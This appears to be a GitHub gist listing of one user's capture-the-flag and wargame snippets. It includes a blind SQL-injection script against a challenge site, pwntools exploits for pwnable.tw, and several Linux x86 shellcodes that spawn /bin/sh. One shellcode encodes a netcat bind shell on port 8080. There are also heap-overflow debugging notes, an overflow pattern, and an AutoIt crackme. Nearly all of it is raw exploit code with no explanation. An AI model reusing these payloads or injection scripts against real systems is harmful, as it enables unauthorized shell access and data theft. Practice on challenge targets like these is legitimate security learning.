Skip to content

Instantly share code, notes, and snippets.

View MtucX's full-sized avatar

MtucX MtucX

1 follower · 1 following
View GitHub Profile
@MtucX
MtucX / orc.py
Created February 27, 2017 12:56
#MtucX
import httplib
result=''
headers={'Cookie':'PHPSESSID='}
string="abcdefghijklmnopqrstuvwxyz0123456789"
for i in range(1,32) :
lengthor='/orc_47190a4d33f675a601f8def32df2583a.php?pw=1%27 or id="admin" and LENGTH(pw)='+str(i)+'%23'
cnx=httplib.HTTPConnection('los.eagle-jump.org')
@MtucX
MtucX / orw.py
Created February 25, 2017 15:06
# MtucX
from pwn import *
host = "chall.pwnable.tw"
port = 10001
shellcode = ("\x31\xc0\x31\xc9\x31\xd2\x50\x68\x66"
"\x6c\x61\x67\x68\x6f\x72\x77\x2f\x68"
"\x6f\x6d\x65\x2f\x68\x2f\x2f\x2f\x68"
@MtucX
MtucX / mtucx.asm
Created February 25, 2017 15:01
_start:
xor eax, eax
xor ecx, ecx
xor edx, edx
push eax
push 'flag'
push 'orw/'
push 'ome/'
push '///h'
@MtucX
MtucX / start.py
Created February 25, 2017 03:52
#MtucX
# pwnable.tw
from pwn import *
#shellcode
shellcode = "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
# leak
leak = p32(0x8048087)
#remote
host = "chall.pwnable.tw"
@MtucX
MtucX / xx.py
Last active February 7, 2017 09:56
import sys
print "hello world"+ sys.argv[1]
@MtucX
MtucX / autoit3 crackme source
Created May 26, 2016 00:54
#include <Crypt.au3>
$dzx = '0x309cd3800aacbd003ac36199fa537295'
$pass = InputBox("MtucX", "EAsy one", "", "*")
$password = _Crypt_HashData($pass, $CALG_MD5)
If $password = $dzx Then
MsgBox(16, "Done ", "You can send me the pass")
Else
MsgBox(16, "lammer", "You entered wrong password")
EndIf
@MtucX
MtucX / shellcode
Created May 10, 2016 13:32
shellcode
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x1e\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41\x42\x42\x42\x42"
130
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
25
@MtucX
MtucX / nothing
Created May 8, 2016 18:08
objdump -d heapoverflow
objdump -d heapoverflow | grep win
***********************************
gdb -q heapoverflow
disas main
r 128
quit
@MtucX
MtucX / 128
Created May 8, 2016 18:05
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae
@MtucX
MtucX / nc 8080
Created May 8, 2016 18:03
\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0f\x88\x46\x19\x89\x76\x1a\x8d\x5e\x08\x89\x5e\x1e\x8d\x5e\x10\x89\x5e\x22\x89\x46\x26\xb0\x0b\x89\xf3\x8d\x4e\x1a\x8d\x56\x26\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x23\x2d\x6c\x70\x38\x30\x38\x30\x23\x2d\x65\x2f\x62\x69\x6e\x2f\x73\x68\x23